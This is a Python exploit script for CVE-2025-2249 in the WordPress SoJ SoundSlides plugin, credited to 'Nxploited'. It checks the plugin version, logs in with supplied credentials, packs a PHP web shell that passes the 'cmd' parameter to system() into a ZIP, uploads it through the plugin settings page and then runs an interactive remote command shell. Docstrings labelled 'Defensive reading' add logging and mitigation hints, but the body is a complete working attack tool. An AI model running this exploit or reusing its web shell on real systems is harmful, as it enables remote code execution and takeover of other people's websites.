import os
import requests
import zipfile
import argparse
import time

BANNER = """
                                                                                                                                      
 @@@@@@@  @@@  @@@  @@@@@@@@              @@@@@@    @@@@@@@@    @@@@@@   @@@@@@@              @@@@@@    @@@@@@        @@@    @@@@@@   
@@@@@@@@  @@@  @@@  @@@@@@@@             @@@@@@@@  @@@@@@@@@@  @@@@@@@@  @@@@@@@             @@@@@@@@  @@@@@@@@      @@@@   @@@@@@@@  
!@@       @@!  @@@  @@!                       @@@  @@!   @@@@       @@@  !@@                      @@@       @@@     @@!@!   @@!  @@@  
!@!       !@!  @!@  !@!                      @!@   !@!  @!@!@      @!@   !@!                     @!@       @!@     !@!!@!   !@!  @!@  
!@!       @!@  !@!  @!!!:!    @!@!@!@!@     !!@    @!@ @! !@!     !!@    !!@@!!   @!@!@!@!@     !!@       !!@     @!! @!!   !!@!!@!!  
!!!       !@!  !!!  !!!!!:    !!!@!@!!!    !!:     !@!!!  !!!    !!:     @!!@!!!  !!!@!@!!!    !!:       !!:     !!!  !@!     !!@!!!  
:!!       :!:  !!:  !!:                   !:!      !!:!   !!!   !:!          !:!              !:!       !:!      :!!:!:!!:       !!!  
:!:        ::!!:!   :!:                  :!:       :!:    !:!  :!:           !:!             :!:       :!:       !:::!!:::       !:!  
 ::: :::    ::::     :: ::::             :: :::::  ::::::: ::  :: :::::  :::: ::             :: :::::  :: :::::       :::   ::::: ::  
 :: :: :     :      : :: ::              :: : :::   : : :  :   :: : :::  :: : :              :: : :::  :: : :::       :::    : :  :   
                                             By: Nxploited | Khaled Alenazi                                                                                                  
"""

def print_banner():
    """Write the module-level ASCII-art ``BANNER`` to standard output."""
    banner_text = BANNER
    print(banner_text)

def create_directories():
    """Create the ``nxploit/data`` and ``nxploit/audio`` staging folders.

    Both paths are relative to the current working directory. Folders that
    already exist are left in place (``exist_ok=True``).
    """
    for staging_dir in ("nxploit/data", "nxploit/audio"):
        os.makedirs(staging_dir, exist_ok=True)

def create_files():
    """Write the four files that make up the staged ``nxploit/`` tree.

    ``index.html``, ``data/data.xml`` and ``audio/audio.mp3`` hold short
    placeholder text (presumably so the tree resembles a presentation
    export; the page does not say). ``nxploit.php`` is the only file with
    behaviour. The ``nxploit/data`` and ``nxploit/audio`` folders must
    already exist.

    Defensive reading: ``nxploit.php`` passes the ``cmd`` query parameter
    straight to PHP ``system()``. The archive is only useful if a ``.php``
    member ends up extracted where the web server will execute it. An
    upload handler that rejects script extensions among archive members,
    and a server rule that refuses to run PHP under ``wp-content/uploads``,
    each break that chain independently.
    """
    php_source = """<?php
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "No command executed.";
}
?>"""

    # Written in this order, one file at a time; a failure stops the rest.
    staged = (
        ("nxploit/index.html", "<html><body>NXploit Presentation</body></html>"),
        ("nxploit/data/data.xml", "<data><title>NXploit</title></data>"),
        ("nxploit/audio/audio.mp3", "DUMMY_AUDIO_CONTENT"),
        ("nxploit/nxploit.php", php_source),
    )
    for target_path, content in staged:
        with open(target_path, "w") as handle:
            handle.write(content)

def create_zip(zip_name="nxploit.zip"):
    """Stage the ``nxploit/`` tree and pack every file in it into *zip_name*.

    Member names are stored relative to ``nxploit/``, so ``nxploit.php``
    sits at the archive root next to ``index.html``, with ``data/`` and
    ``audio/`` as sub-folders.

    Defensive reading: from the outside this is an ordinary ZIP with the
    declared type ``application/zip``. The ``.php`` member only shows up if
    the receiving handler lists member names and checks their extensions
    before extracting.
    """
    create_directories()
    create_files()

    with zipfile.ZipFile(zip_name, "w") as archive:
        for folder, _subdirs, names in os.walk("nxploit"):
            for name in names:
                source = os.path.join(folder, name)
                archive.write(source, arcname=os.path.relpath(source, "nxploit"))
    print(f"[+] ZIP created: {zip_name}")

def check_version(base_url):
    """Return True when the plugin readme advertises ``Stable tag: 1.2.2``.

    Fetches ``<base_url>/wp-content/plugins/soj-soundslides/readme.txt``
    with a 5-second timeout. The result is True only for HTTP 200 with the
    literal substring ``Stable tag: 1.2.2`` in the body. Every other
    outcome, including any exception, prints a message and returns False.

    Defensive reading: this is an unauthenticated GET made with the
    module-level ``requests.get``, not the session built in ``main()``. It
    therefore does not carry the ``Mozilla/5.0`` header used later and goes
    out with the ``requests`` default User-Agent. Requests for this plugin's
    ``readme.txt`` are the fingerprinting step and are worth alerting on.
    The page names no fixed release, so confirm the remediation version
    against the vendor advisory.
    """
    readme_url = base_url + "/wp-content/plugins/soj-soundslides/readme.txt"
    print(f"[*] Checking plugin version at {readme_url} ...")
    try:
        reply = requests.get(readme_url, timeout=5)
        # Guard clauses: anything short of "200 + matching tag" is a negative.
        if reply.status_code != 200:
            print("[-] Plugin readme not accessible.")
            return False
        if "Stable tag: 1.2.2" not in reply.text:
            print("[!] Plugin found but version not confirmed as vulnerable.")
            return False
        print("[+] Vulnerable version 1.2.2 detected.")
        return True
    except Exception as err:
        print(f"[!] Error while checking version: {err}")
        return False

def interactive_shell(shell_url):
    """Relay operator-typed lines to *shell_url* until ``exit`` or ``quit``.

    Each stripped input line is sent as the ``cmd`` query parameter of a GET
    request with a 5-second timeout, and the response body is printed.
    Request errors are printed and the loop continues.

    Defensive reading: every command travels in the URL query string of a
    GET to a ``.php`` file under ``wp-content/uploads``. It is therefore
    typically recorded verbatim in web-server access logs. The calls use
    the module-level ``requests.get``, so they carry the ``requests``
    default User-Agent and none of the session cookies from ``main()``.
    """
    print("[*] Entering interactive shell (type 'exit' to quit):")
    leave_words = ("exit", "quit")
    while True:
        command = input("> ").strip()
        if command.lower() in leave_words:
            print("[+] Exiting shell.")
            return
        try:
            reply = requests.get(shell_url, params={"cmd": command}, timeout=5)
            print(reply.text)
        except Exception as err:
            print(f"[!] Error: {err}")

def main():
    """Parse CLI arguments and run the version check, login, upload and probe.

    Request sequence as written here, which is also the order a defender
    would see in access logs:

    1. GET  /wp-content/plugins/soj-soundslides/readme.txt  (via check_version)
    2. POST /wp-login.php  with the supplied username and password
    3. multipart POST /wp-admin/options-general.php?page=soj-soundslides%2Fsoj-soundslides.php
       with ``action=updateSoJSoundslide`` and a ZIP in ``soj-soundslide_ptw_zip``
    4. GET  /wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php,
       followed by GETs to the same path with a ``cmd`` query parameter

    The script needs a working WordPress login; the page does not state
    which role is required. The function returns None on every path and
    reports progress only through ``print``.
    """
    print_banner()
    parser = argparse.ArgumentParser(description="Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,")
    parser.add_argument("-u", "--url", required=True, help="WordPress base URL")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    args = parser.parse_args()

    session = requests.Session()
    # TLS certificate validation is switched off for every request made
    # through `session`, so the login POST below sends the supplied
    # credentials without authenticating the server.
    session.verify = False
    # Silences the warnings urllib3 would otherwise print for the
    # unverified HTTPS requests above.
    requests.packages.urllib3.disable_warnings()
    # Fixed User-Agent, passed explicitly on session requests only;
    # check_version() and interactive_shell() do not send it.
    headers = {"User-Agent": "Mozilla/5.0"}

    # Gate: stop unless readme.txt reports "Stable tag: 1.2.2".
    # NOTE(review): the message says "attempted", but only the readme fetch
    # has been sent at this point.
    if not check_version(args.url):
        print("[!] Exploit attempted, but vulnerable version not confirmed.")
        return

    login_url = args.url + "/wp-login.php"
    # Field names of the standard wp-login.php form.
    login_data = {
        "log": args.username,
        "pwd": args.password,
        "rememberme": "forever",
        "wp-submit": "Log In"
    }

    print("[*] Attempting login ...")
    # NOTE(review): `response` is never read. Success is inferred only from
    # a cookie whose name contains "wordpress_logged_in". No timeout is set.
    response = session.post(login_url, data=login_data, headers=headers)
    if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
        print("[+] Login successful.")
    else:
        print("[-] Login failed.")
        return

    zip_name = "nxploit.zip"
    # An nxploit.zip already present in the working directory is reused
    # as-is; its contents are not checked or rebuilt.
    if not os.path.exists(zip_name):
        create_zip(zip_name)

    # Plugin settings page. The form field names below come from this
    # script; the plugin-side handler is not shown on the page.
    upload_url = args.url + "/wp-admin/options-general.php?page=soj-soundslides%2Fsoj-soundslides.php"
    files = {
        # NOTE(review): this file object is never closed.
        "soj-soundslide_ptw_zip": (zip_name, open(zip_name, "rb"), "application/zip")
    }
    data = {
        # Reused as the folder name in shell_url below.
        "soj-soundslide_presentation_name": "nxploit_shell",
        "action": "updateSoJSoundslide",
        "info_update": "Update options »"
    }

    print("[*] Uploading shell...")
    # NOTE(review): `res` is never inspected, so a rejected upload is only
    # noticed by the probe below.
    res = session.post(upload_url, files=files, data=data, headers=headers)

    print("[*] Waiting 3 seconds before checking shell ...")
    time.sleep(3)

    # Location this script expects the archive to be extracted to:
    # wp-content/uploads/SoundSlides/<presentation name>/. Unexpected .php
    # files under that directory, and requests to them, are the artefacts
    # to hunt for. Denying PHP execution under wp-content/uploads makes the
    # probe below return the file as text or an error instead of running it.
    shell_url = f"{args.url}/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php"
    try:
        check = session.get(shell_url, headers=headers, timeout=5)
        # Any HTTP 200 counts as success; the response body is not examined.
        if check.status_code == 200:
            print(f"[+] Shell uploaded: {shell_url}")
            interactive_shell(shell_url)
        else:
            print("[-] Shell upload may have failed.")
    except Exception as e:
        print(f"[!] Error accessing shell: {e}")

# Entry-point guard: main() runs only when the file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()